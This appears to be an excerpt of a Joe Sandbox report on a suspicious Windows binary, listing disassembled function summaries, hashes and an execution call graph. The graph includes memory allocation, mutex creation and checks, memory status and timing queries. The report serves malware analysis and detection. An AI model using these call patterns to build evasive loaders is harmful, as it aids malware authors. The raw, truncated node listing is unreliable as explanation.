                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 203985260-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5e1618f7bc1bca95b3e8604ce1bc83e5153bea5e831bfefe6ea90ca9e28d2e63
                                                                                                                                                                                                                                                                                      • Instruction ID: 260080c49230cd3ef4eeaaa7ebb5c7b9c06d5c11ec3782ebdac460f638bd9c13
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e1618f7bc1bca95b3e8604ce1bc83e5153bea5e831bfefe6ea90ca9e28d2e63
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF216F76A18B4587E7208F16E84471EB6B4FB89F88F740138DB8993B54DF7CD8058B80
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF60C47DAA5
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF60C482744: MultiByteToWideChar.KERNEL32 ref: 00007FF60C482760
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF60C482744: GetLastError.KERNEL32 ref: 00007FF60C48276E
                                                                                                                                                                                                                                                                                      • __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF60C47DB41
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF60C480610: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF60C471052), ref: 00007FF60C480714
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __std_fs_convert_narrow_to_wide$ByteCharErrorLastMultiWidememcpy
                                                                                                                                                                                                                                                                                      • String ID: Unknown exception
                                                                                                                                                                                                                                                                                      • API String ID: 3269794198-410509341
                                                                                                                                                                                                                                                                                      • Opcode ID: dde8ac24ea4e23b5cf8b3e9ef1c9d7409fece03b04fa08682d1531e396523846
                                                                                                                                                                                                                                                                                      • Instruction ID: b8504250f0a9492f015bf9a0932612d1b2b7e51c2700585ccd563263f13ccb09
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dde8ac24ea4e23b5cf8b3e9ef1c9d7409fece03b04fa08682d1531e396523846
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53313362F2878682EB289F62A40066D2690FF44FCCF245236DE5D87794DF7DE445E340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,00007FF60C480605,?,?,?,?,00007FF60C471052), ref: 00007FF60C47214B
                                                                                                                                                                                                                                                                                      • __std_exception_copy.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF60C480605,?,?,?,?,00007FF60C471052), ref: 00007FF60C472184
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Xlength_error@std@@__std_exception_copy
                                                                                                                                                                                                                                                                                      • String ID: string too long
                                                                                                                                                                                                                                                                                      • API String ID: 127952674-2556327735
                                                                                                                                                                                                                                                                                      • Opcode ID: fe3d25bc592f77ab57f695f93125f1906d16910371829d983fa6ef7ea299a8c0
                                                                                                                                                                                                                                                                                      • Instruction ID: 1d4ff668fed7f63295a39e372ee726107ee8f81d859cfc0a3ee9076287aed82e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe3d25bc592f77ab57f695f93125f1906d16910371829d983fa6ef7ea299a8c0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4E06D61E04B4AD0EB018F61E8905AC3361FF28B58BA48131CD5D86364EF7CE1EDC380

                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                      Execution Coverage:2.9%
                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                      Signature Coverage:6.8%
                                                                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:2
                                                                                                                                                                                                                                                                                      execution_graph 13495 7ff6a9520640 13496 7ff6a952066a 13495->13496 13497 7ff6a95206f8 CreateDXGIFactory ?_Random_device@std@ 13496->13497 13498 7ff6a952072c 13497->13498 13652 7ff6a9511670 _Query_perf_frequency _Query_perf_counter 13498->13652 13500 7ff6a952076b 13654 7ff6a952fe80 13500->13654 13502 7ff6a95207b7 13657 7ff6a952feb0 13502->13657 13504 7ff6a95207f5 13660 7ff6a952fee0 13504->13660 13506 7ff6a9520833 13663 7ff6a952ff10 13506->13663 13508 7ff6a9520871 13666 7ff6a952ff40 13508->13666 13510 7ff6a95208af 13669 7ff6a952ff70 13510->13669 13512 7ff6a95208ed 13513 7ff6a9511670 2 API calls 13512->13513 13540 7ff6a952092b 13513->13540 13514 7ff6a9520c7e 13672 7ff6a952e300 13514->13672 13517 7ff6a9520c97 ?_Random_device@std@ 13518 7ff6a9520cab 13517->13518 13521 7ff6a9511670 2 API calls 13518->13521 13522 7ff6a9520ce6 13521->13522 13523 7ff6a952fe80 3 API calls 13522->13523 13526 7ff6a9520d32 13523->13526 13524 7ff6a9520a2b pow 13524->13540 13525 7ff6a9520a56 tan 13687 7ff6a952ea80 13525->13687 13528 7ff6a952feb0 3 API calls 13526->13528 13530 7ff6a9520d70 13528->13530 13531 7ff6a952fee0 3 API calls 13530->13531 13533 7ff6a9520dae 13531->13533 13534 7ff6a952ff10 3 API calls 13533->13534 13535 7ff6a9520dec 13534->13535 13536 7ff6a952ff40 3 API calls 13535->13536 13537 7ff6a9520e2a 13536->13537 13538 7ff6a952ff70 3 API calls 13537->13538 13542 7ff6a9520e68 13538->13542 13540->13514 13540->13524 13540->13525 13544 7ff6a9511670 2 API calls 13540->13544 13691 7ff6a952e450 13540->13691 13694 7ff6a9512460 13540->13694 13700 7ff6a952e3f0 13540->13700 13706 7ff6a952ea20 13540->13706 13543 7ff6a9511670 2 API calls 13542->13543 13607 7ff6a9520ea6 13543->13607 13544->13540 13545 7ff6a95211ee 13546 7ff6a952e300 2 API calls 13545->13546 13570 7ff6a95211fe 13546->13570 13547 7ff6a952178f ?_Random_device@std@ 13549 7ff6a95217c0 13547->13549 13549->13549 13550 7ff6a9511670 2 API calls 13549->13550 13552 7ff6a9521821 13550->13552 13678 7ff6a953a968 13552->13678 13554 7ff6a9521850 13559 7ff6a9521878 13554->13559 13731 7ff6a9532150 13554->13731 13555 7ff6a95236d0 13780 7ff6a95118f0 ?_Xlength_error@std@@YAXPEBD 13555->13780 13557 7ff6a95236d5 13781 7ff6a9511850 13557->13781 13562 7ff6a953a968 std::_Facet_Register 3 API calls 13559->13562 13560 7ff6a953a968 __std_exception_copy malloc _CxxThrowException std::_Facet_Register 13560->13570 13564 7ff6a95218fa 13562->13564 13563 7ff6a95236db 13569 7ff6a9532150 6 API calls 13564->13569 13574 7ff6a9521922 13564->13574 13565 7ff6a95218af _invalid_parameter_noinfo_noreturn 13568 7ff6a95218b6 _invalid_parameter_noinfo_noreturn 13565->13568 13566 7ff6a9520f9b pow 13566->13607 13567 7ff6a952165b memchr 13567->13570 13568->13554 13569->13574 13570->13547 13570->13555 13570->13557 13570->13560 13570->13565 13570->13567 13570->13568 13572 7ff6a9521690 memcmp 13570->13572 13575 7ff6a953a960 free _Receive_impl 13570->13575 13712 7ff6a952e780 13570->13712 13571 7ff6a9520fc6 tan 13573 7ff6a952ea80 7 API calls 13571->13573 13572->13570 13576 7ff6a95216a8 memchr 13572->13576 13573->13607 13577 7ff6a953a968 std::_Facet_Register 3 API calls 13574->13577 13575->13570 13576->13570 13576->13572 13578 7ff6a9521977 13577->13578 13579 7ff6a9532150 6 API calls 13578->13579 13581 7ff6a952199f 13578->13581 13579->13581 13580 7ff6a952e450 4 API calls 13580->13607 13582 7ff6a953a968 std::_Facet_Register 3 API calls 13581->13582 13583 7ff6a95219f4 13582->13583 13585 7ff6a9532150 6 API calls 13583->13585 13586 7ff6a9521a1c 13583->13586 13584 7ff6a9512460 9 API calls 13584->13607 13585->13586 13587 7ff6a953a968 std::_Facet_Register 3 API calls 13586->13587 13588 7ff6a9521a71 13587->13588 13589 7ff6a9532150 6 API calls 13588->13589 13590 7ff6a9521a99 13588->13590 13589->13590 13591 7ff6a953a968 std::_Facet_Register 3 API calls 13590->13591 13592 7ff6a9521aee 13591->13592 13593 7ff6a9532150 6 API calls 13592->13593 13611 7ff6a9521b16 13592->13611 13593->13611 13594 7ff6a9521b7c _Query_perf_frequency _Query_perf_counter 13594->13611 13595 7ff6a9522768 GlobalMemoryStatusEx ?_Random_device@std@ 13596 7ff6a95227a2 13595->13596 13600 7ff6a9511670 2 API calls 13596->13600 13597 7ff6a952274e 13768 7ff6a953a960 13597->13768 13598 7ff6a9522747 _invalid_parameter_noinfo_noreturn 13598->13597 13603 7ff6a95227ce 13600->13603 13601 7ff6a95226c4 13601->13595 13601->13597 13601->13598 13604 7ff6a953a968 std::_Facet_Register 3 API calls 13603->13604 13606 7ff6a95227fd 13604->13606 13605 7ff6a952e3f0 2 API calls 13605->13607 13609 7ff6a9532150 6 API calls 13606->13609 13610 7ff6a9522822 13606->13610 13607->13545 13607->13566 13607->13571 13607->13580 13607->13584 13607->13605 13608 7ff6a952ea20 collate 2 API calls 13607->13608 13613 7ff6a9511670 2 API calls 13607->13613 13608->13607 13609->13610 13612 7ff6a953a968 std::_Facet_Register 3 API calls 13610->13612 13611->13594 13611->13601 13619 7ff6a9521e3f log cos sin exp 13611->13619 13624 7ff6a9521ede pow 13611->13624 13626 7ff6a9521f4e tan 13611->13626 13648 7ff6a95226b6 _invalid_parameter_noinfo_noreturn 13611->13648 13649 7ff6a953a960 free _Receive_impl 13611->13649 13651 7ff6a95226bd _invalid_parameter_noinfo_noreturn 13611->13651 13764 7ff6a9532ac0 13611->13764 13614 7ff6a9522874 13612->13614 13613->13607 13615 7ff6a9522899 13614->13615 13616 7ff6a9532150 6 API calls 13614->13616 13617 7ff6a953a968 std::_Facet_Register 3 API calls 13615->13617 13616->13615 13618 7ff6a95228eb 13617->13618 13620 7ff6a9532150 6 API calls 13618->13620 13621 7ff6a9522910 13618->13621 13619->13611 13620->13621 13622 7ff6a953a968 std::_Facet_Register 3 API calls 13621->13622 13623 7ff6a9522962 13622->13623 13625 7ff6a9532150 6 API calls 13623->13625 13627 7ff6a9522987 13623->13627 13624->13611 13625->13627 13747 7ff6a95311f0 13626->13747 13628 7ff6a953a968 std::_Facet_Register 3 API calls 13627->13628 13630 7ff6a95229d9 13628->13630 13631 7ff6a9532150 6 API calls 13630->13631 13634 7ff6a95229fc 13630->13634 13631->13634 13632 7ff6a953a968 std::_Facet_Register 3 API calls 13633 7ff6a9522043 memset 13632->13633 13633->13611 13637 7ff6a952ff70 3 API calls 13634->13637 13635 7ff6a9521fa5 13635->13632 13638 7ff6a9522a40 13637->13638 13639 7ff6a9522a72 _Query_perf_frequency _Query_perf_counter 13638->13639 13645 7ff6a9522a8d 13639->13645 13640 7ff6a952363a 13771 7ff6a953a940 13640->13771 13641 7ff6a95235b2 13641->13640 13642 7ff6a9523632 13641->13642 13643 7ff6a952362b _invalid_parameter_noinfo_noreturn 13641->13643 13644 7ff6a953a960 _Receive_impl free 13642->13644 13643->13642 13644->13640 13645->13641 13646 7ff6a9522d1f log cos sin exp 13645->13646 13647 7ff6a9522d90 13646->13647 13650 7ff6a9522dbe pow 13647->13650 13648->13651 13649->13611 13650->13641 13651->13601 13653 7ff6a9511698 13652->13653 13653->13500 13655 7ff6a953a968 std::_Facet_Register 3 API calls 13654->13655 13656 7ff6a952fe98 13655->13656 13656->13502 13658 7ff6a953a968 std::_Facet_Register 3 API calls 13657->13658 13659 7ff6a952fec8 13658->13659 13659->13504 13661 7ff6a953a968 std::_Facet_Register 3 API calls 13660->13661 13662 7ff6a952fef8 13661->13662 13662->13506 13664 7ff6a953a968 std::_Facet_Register 3 API calls 13663->13664 13665 7ff6a952ff28 13664->13665 13665->13508 13667 7ff6a953a968 std::_Facet_Register 3 API calls 13666->13667 13668 7ff6a952ff58 13667->13668 13668->13510 13670 7ff6a953a968 std::_Facet_Register 3 API calls 13669->13670 13671 7ff6a952ff88 13670->13671 13671->13512 13673 7ff6a9520c8e 13672->13673 13674 7ff6a952e315 13672->13674 13673->13517 13673->13640 13675 7ff6a952e36f 13674->13675 13676 7ff6a952e38f _invalid_parameter_noinfo_noreturn 13674->13676 13677 7ff6a953a960 _Receive_impl free 13675->13677 13677->13673 13679 7ff6a953a982 malloc 13678->13679 13680 7ff6a953a98c 13679->13680 13681 7ff6a953a973 13679->13681 13680->13554 13681->13679 13682 7ff6a953a992 13681->13682 13683 7ff6a953a99d 13682->13683 13784 7ff6a953b444 13682->13784 13684 7ff6a9511850 Concurrency::cancel_current_task __std_exception_copy 13683->13684 13686 7ff6a953a9a3 13684->13686 13688 7ff6a952eaa0 13687->13688 13688->13688 13689 7ff6a95311f0 7 API calls 13688->13689 13690 7ff6a952eaae 13689->13690 13690->13540 13692 7ff6a953a968 std::_Facet_Register 3 API calls 13691->13692 13693 7ff6a952e474 memset 13692->13693 13693->13540 13695 7ff6a95124a6 13694->13695 13696 7ff6a9532ac0 memcpy 13695->13696 13697 7ff6a95124ea 13696->13697 13698 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 13697->13698 13699 7ff6a95124f7 13698->13699 13699->13540 13701 7ff6a952e401 13700->13701 13702 7ff6a952e432 13700->13702 13703 7ff6a952e42a 13701->13703 13704 7ff6a952e445 _invalid_parameter_noinfo_noreturn 13701->13704 13702->13540 13705 7ff6a953a960 _Receive_impl free 13703->13705 13705->13702 13707 7ff6a952ea5f 13706->13707 13709 7ff6a952ea33 13706->13709 13707->13540 13708 7ff6a952ea57 13711 7ff6a953a960 _Receive_impl free 13708->13711 13709->13708 13710 7ff6a952ea78 _invalid_parameter_noinfo_noreturn 13709->13710 13711->13707 13713 7ff6a952e7b0 13712->13713 13713->13713 13714 7ff6a952e7cd 13713->13714 13715 7ff6a952e8b4 13713->13715 13716 7ff6a952e7d8 memcpy 13714->13716 13720 7ff6a952e7f9 13714->13720 13788 7ff6a95118f0 ?_Xlength_error@std@@YAXPEBD 13715->13788 13718 7ff6a952e8a0 13716->13718 13718->13570 13719 7ff6a952e8b9 13723 7ff6a9511850 Concurrency::cancel_current_task __std_exception_copy 13719->13723 13720->13719 13721 7ff6a952e836 memcpy 13720->13721 13722 7ff6a952e877 13720->13722 13726 7ff6a952e829 13720->13726 13721->13718 13725 7ff6a953a968 std::_Facet_Register 3 API calls 13722->13725 13727 7ff6a952e8bf 13723->13727 13725->13721 13728 7ff6a953a968 std::_Facet_Register 3 API calls 13726->13728 13729 7ff6a952e831 13728->13729 13729->13721 13730 7ff6a952e870 _invalid_parameter_noinfo_noreturn 13729->13730 13730->13722 13732 7ff6a953235f 13731->13732 13736 7ff6a953218e 13731->13736 13789 7ff6a95323e0 ?_Xlength_error@std@@YAXPEBD 13732->13789 13733 7ff6a9532364 13735 7ff6a9511850 Concurrency::cancel_current_task __std_exception_copy 13733->13735 13737 7ff6a953236a 13735->13737 13736->13733 13738 7ff6a95321fb 13736->13738 13739 7ff6a9532224 13736->13739 13744 7ff6a95321ed 13736->13744 13738->13733 13741 7ff6a953a968 std::_Facet_Register 3 API calls 13738->13741 13740 7ff6a953a968 std::_Facet_Register 3 API calls 13739->13740 13740->13744 13741->13744 13742 7ff6a9532324 13742->13559 13743 7ff6a9532358 _invalid_parameter_noinfo_noreturn 13743->13732 13744->13742 13744->13743 13745 7ff6a953231c 13744->13745 13746 7ff6a953a960 _Receive_impl free 13745->13746 13746->13742 13748 7ff6a9531216 13747->13748 13749 7ff6a95312e0 13747->13749 13750 7ff6a953121c memcpy 13748->13750 13757 7ff6a953123b 13748->13757 13790 7ff6a95118f0 ?_Xlength_error@std@@YAXPEBD 13749->13790 13750->13635 13752 7ff6a953124c 13758 7ff6a953a968 std::_Facet_Register 3 API calls 13752->13758 13753 7ff6a95312e5 13759 7ff6a9511850 Concurrency::cancel_current_task __std_exception_copy 13753->13759 13754 7ff6a9531267 memcpy 13754->13635 13756 7ff6a95312ac 13760 7ff6a953a968 std::_Facet_Register 3 API calls 13756->13760 13757->13752 13757->13753 13757->13754 13757->13756 13761 7ff6a9531262 13758->13761 13762 7ff6a95312eb 13759->13762 13760->13754 13761->13754 13763 7ff6a95312a5 _invalid_parameter_noinfo_noreturn 13761->13763 13763->13756 13766 7ff6a9532af0 13764->13766 13765 7ff6a9532b9d memcpy 13765->13766 13766->13765 13767 7ff6a9532bbc 13766->13767 13767->13611 13767->13767 13769 7ff6a953acb4 free 13768->13769 13772 7ff6a953a949 13771->13772 13773 7ff6a9523677 13772->13773 13774 7ff6a953b2dc IsProcessorFeaturePresent 13772->13774 13775 7ff6a953b2f4 13774->13775 13791 7ff6a953b3b0 RtlCaptureContext 13775->13791 13782 7ff6a951185e Concurrency::cancel_current_task 13781->13782 13783 7ff6a951186f __std_exception_copy 13782->13783 13783->13563 13787 7ff6a953b424 13784->13787 13786 7ff6a953b452 _CxxThrowException 13787->13786 13792 7ff6a953b3ca RtlLookupFunctionEntry 13791->13792 13793 7ff6a953b307 13792->13793 13794 7ff6a953b3e0 RtlVirtualUnwind 13792->13794 13795 7ff6a953b2a8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13793->13795 13794->13792 13794->13793 13796 7ff6a953add4 13797 7ff6a953ade8 13796->13797 13798 7ff6a953af20 13797->13798 13799 7ff6a953adf0 __scrt_acquire_startup_lock 13797->13799 14172 7ff6a953b480 IsProcessorFeaturePresent 13798->14172 13801 7ff6a953af2a 13799->13801 13807 7ff6a953ae0e __scrt_release_startup_lock 13799->13807 13802 7ff6a953b480 9 API calls 13801->13802 13803 7ff6a953af35 13802->13803 13805 7ff6a953af3d _exit 13803->13805 13804 7ff6a953ae33 13806 7ff6a953aeb9 13818 7ff6a953b5c8 memset GetStartupInfoW 13806->13818 13807->13804 13807->13806 13810 7ff6a953aeb1 _register_thread_local_exe_atexit_callback 13807->13810 13809 7ff6a953aebe _get_narrow_winmain_command_line 13819 7ff6a9524580 13809->13819 13810->13806 13815 7ff6a953aee5 13816 7ff6a953aeea _cexit 13815->13816 13817 7ff6a953aeef 13815->13817 13816->13817 13817->13804 13818->13809 13821 7ff6a95245a4 13819->13821 13820 7ff6a9524937 VirtualAlloc 13822 7ff6a9524958 13820->13822 13821->13820 13821->13822 14178 7ff6a95236e0 13822->14178 13825 7ff6a9524ade VirtualAlloc 13826 7ff6a9524b03 13825->13826 13827 7ff6a9524bee ?_Random_device@std@ 13826->13827 13830 7ff6a9525ced 13826->13830 13828 7ff6a9524c20 13827->13828 13828->13828 13829 7ff6a9511670 2 API calls 13828->13829 13831 7ff6a9524c89 13829->13831 13833 7ff6a9525f47 13830->13833 13834 7ff6a952b854 13830->13834 13832 7ff6a953a968 std::_Facet_Register 3 API calls 13831->13832 13835 7ff6a9524cbe 13832->13835 14227 7ff6a9531b10 13833->14227 14760 7ff6a95118f0 ?_Xlength_error@std@@YAXPEBD 13834->14760 13839 7ff6a9532150 6 API calls 13835->13839 13842 7ff6a9524cea 13835->13842 13838 7ff6a9525f82 CreateMutexA 13841 7ff6a9525fbf 13838->13841 13847 7ff6a9525ff4 13838->13847 13839->13842 13844 7ff6a95276f4 _invalid_parameter_noinfo_noreturn 13841->13844 13845 7ff6a953a960 _Receive_impl free 13841->13845 13843 7ff6a953a968 std::_Facet_Register 3 API calls 13842->13843 13846 7ff6a9524d51 13843->13846 13850 7ff6a95276fb 13844->13850 13845->13847 13849 7ff6a9532150 6 API calls 13846->13849 13852 7ff6a9524d7d 13846->13852 13848 7ff6a95262cd VirtualAlloc 13847->13848 13857 7ff6a95262f2 13847->13857 13848->13857 13849->13852 14240 7ff6a9530680 13850->14240 13853 7ff6a953a968 std::_Facet_Register 3 API calls 13852->13853 13855 7ff6a9524de4 13853->13855 13854 7ff6a952793e 13859 7ff6a9527946 OpenMutexA 13854->13859 13860 7ff6a9532150 6 API calls 13855->13860 13862 7ff6a9524e10 13855->13862 13856 7ff6a952644d VirtualAlloc 13858 7ff6a9526472 13856->13858 13857->13856 13857->13858 13858->13850 13863 7ff6a9526561 ?_Random_device@std@ 13858->13863 13861 7ff6a952ea20 collate 2 API calls 13859->13861 13860->13862 13875 7ff6a9527966 13861->13875 13864 7ff6a953a968 std::_Facet_Register 3 API calls 13862->13864 13866 7ff6a9526590 13863->13866 13865 7ff6a9524e77 13864->13865 13868 7ff6a9532150 6 API calls 13865->13868 13870 7ff6a9524ea3 13865->13870 13866->13866 13867 7ff6a95265b2 _Query_perf_frequency _Query_perf_counter 13866->13867 13869 7ff6a9526607 13867->13869 13868->13870 13871 7ff6a953a968 std::_Facet_Register 3 API calls 13869->13871 13873 7ff6a953a968 std::_Facet_Register 3 API calls 13870->13873 13874 7ff6a95266bd 13871->13874 13872 7ff6a9527c0c VirtualAlloc 13877 7ff6a9527c2d 13872->13877 13876 7ff6a9524f0a 13873->13876 13881 7ff6a9532150 6 API calls 13874->13881 13884 7ff6a95266e9 13874->13884 13875->13872 13878 7ff6a9527bf7 13875->13878 13879 7ff6a9527cef 13875->13879 13880 7ff6a9532150 6 API calls 13876->13880 13883 7ff6a9524f36 13876->13883 13877->13877 13877->13879 13878->13872 13882 7ff6a9527d2e CloseHandle ?_Random_device@std@ 13879->13882 13900 7ff6a9528361 13879->13900 13880->13883 13881->13884 13885 7ff6a9527d4c 13882->13885 13886 7ff6a953a968 std::_Facet_Register 3 API calls 13883->13886 13887 7ff6a953a968 std::_Facet_Register 3 API calls 13884->13887 13890 7ff6a9511670 2 API calls 13885->13890 13888 7ff6a9524f9d 13886->13888 13889 7ff6a9526750 13887->13889 13892 7ff6a9532150 6 API calls 13888->13892 13956 7ff6a9524fc9 13888->13956 13891 7ff6a9532150 6 API calls 13889->13891 13893 7ff6a952677c 13889->13893 13896 7ff6a9527d90 13890->13896 13891->13893 13892->13956 13895 7ff6a953a968 std::_Facet_Register 3 API calls 13893->13895 13894 7ff6a952504a _Query_perf_frequency _Query_perf_counter 13894->13956 13898 7ff6a95267e3 13895->13898 13899 7ff6a952fe80 3 API calls 13896->13899 13897 7ff6a95285ec VirtualAlloc 13903 7ff6a952860d 13897->13903 13901 7ff6a9532150 6 API calls 13898->13901 13905 7ff6a952680f 13898->13905 13914 7ff6a9527de7 13899->13914 13900->13897 13902 7ff6a95285d7 13900->13902 13911 7ff6a95286cf 13900->13911 13901->13905 13902->13897 13903->13903 13903->13911 13904 7ff6a9525ce8 13906 7ff6a953a940 Concurrency::cancel_current_task 8 API calls 13904->13906 13909 7ff6a953a968 std::_Facet_Register 3 API calls 13905->13909 13910 7ff6a952b7fa 13906->13910 13907 7ff6a9525c59 13907->13844 13907->13904 13908 7ff6a9525ce0 13907->13908 13912 7ff6a953a960 _Receive_impl free 13908->13912 13913 7ff6a9526876 13909->13913 14170 7ff6a953b60c GetModuleHandleW 13910->14170 13911->13911 14248 7ff6a9530720 13911->14248 13912->13904 13916 7ff6a9532150 6 API calls 13913->13916 13919 7ff6a95268a2 13913->13919 13917 7ff6a952feb0 3 API calls 13914->13917 13916->13919 13929 7ff6a9527e34 13917->13929 13921 7ff6a953a968 std::_Facet_Register 3 API calls 13919->13921 13923 7ff6a9526909 13921->13923 13922 7ff6a9528995 14264 7ff6a9512710 13922->14264 13926 7ff6a9532150 6 API calls 13923->13926 13928 7ff6a9526935 13923->13928 13925 7ff6a9528c43 14431 7ff6a952c650 ?_Init@locale@std@@CAPEAV_Locimp@12@_N 13925->14431 13926->13928 13927 7ff6a95289a5 13927->13925 13927->13927 13933 7ff6a9528c12 13927->13933 13932 7ff6a953a968 std::_Facet_Register 3 API calls 13928->13932 13930 7ff6a952fee0 3 API calls 13929->13930 13946 7ff6a9527e81 13930->13946 13935 7ff6a952699c 13932->13935 13936 7ff6a952ea80 7 API calls 13933->13936 13938 7ff6a9532150 6 API calls 13935->13938 13972 7ff6a95269c8 13935->13972 13937 7ff6a9528c27 13936->13937 14270 7ff6a951d3a0 13937->14270 13938->13972 13942 7ff6a952ea80 7 API calls 13945 7ff6a9529047 13942->13945 13943 7ff6a952ea20 collate 2 API calls 13943->13925 13944 7ff6a9526a50 _Query_perf_frequency _Query_perf_counter 13944->13972 14448 7ff6a9517ec0 13945->14448 13949 7ff6a952ff10 3 API calls 13946->13949 13948 7ff6a9525330 log cos sin exp 13948->13956 13960 7ff6a9527ece 13949->13960 13953 7ff6a952ea20 collate 2 API calls 13954 7ff6a952907e 13953->13954 13958 7ff6a952908c ?_Random_device@std@ 13954->13958 13955 7ff6a95253cf pow 13955->13956 13956->13894 13956->13907 13956->13948 13956->13955 13962 7ff6a9525432 tan 13956->13962 13971 7ff6a9532ac0 memcpy 13956->13971 13999 7ff6a9525c4b _invalid_parameter_noinfo_noreturn 13956->13999 14001 7ff6a9525c52 _invalid_parameter_noinfo_noreturn 13956->14001 14003 7ff6a953a960 free _Receive_impl 13956->14003 13957 7ff6a9527663 13957->13844 13957->13904 13957->13908 13959 7ff6a95290a1 13958->13959 13963 7ff6a9511670 2 API calls 13959->13963 13961 7ff6a952ff40 3 API calls 13960->13961 13968 7ff6a9527f1b 13961->13968 13964 7ff6a95311f0 7 API calls 13962->13964 13967 7ff6a95290e1 13963->13967 13970 7ff6a952548d 13964->13970 13965 7ff6a953a968 std::_Facet_Register 3 API calls 13966 7ff6a9525536 memset 13965->13966 13966->13956 13969 7ff6a952fe80 3 API calls 13967->13969 13973 7ff6a952ff70 3 API calls 13968->13973 13974 7ff6a9529138 13969->13974 13970->13965 13971->13956 13972->13944 13972->13957 13978 7ff6a9526d30 log cos sin exp 13972->13978 13979 7ff6a9526dcf pow 13972->13979 13986 7ff6a9526e32 tan 13972->13986 13992 7ff6a9532ac0 memcpy 13972->13992 14010 7ff6a9527655 _invalid_parameter_noinfo_noreturn 13972->14010 14011 7ff6a953a960 free _Receive_impl 13972->14011 14014 7ff6a952765c _invalid_parameter_noinfo_noreturn 13972->14014 13975 7ff6a9527f68 13973->13975 13976 7ff6a952feb0 3 API calls 13974->13976 13977 7ff6a9511670 2 API calls 13975->13977 13982 7ff6a9529185 13976->13982 14022 7ff6a9527fb5 13977->14022 13978->13972 13979->13972 13980 7ff6a952834b 13981 7ff6a952e300 2 API calls 13980->13981 13983 7ff6a952835c ReleaseMutex 13981->13983 13984 7ff6a952fee0 3 API calls 13982->13984 13983->13904 13990 7ff6a95291d2 13984->13990 13987 7ff6a95311f0 7 API calls 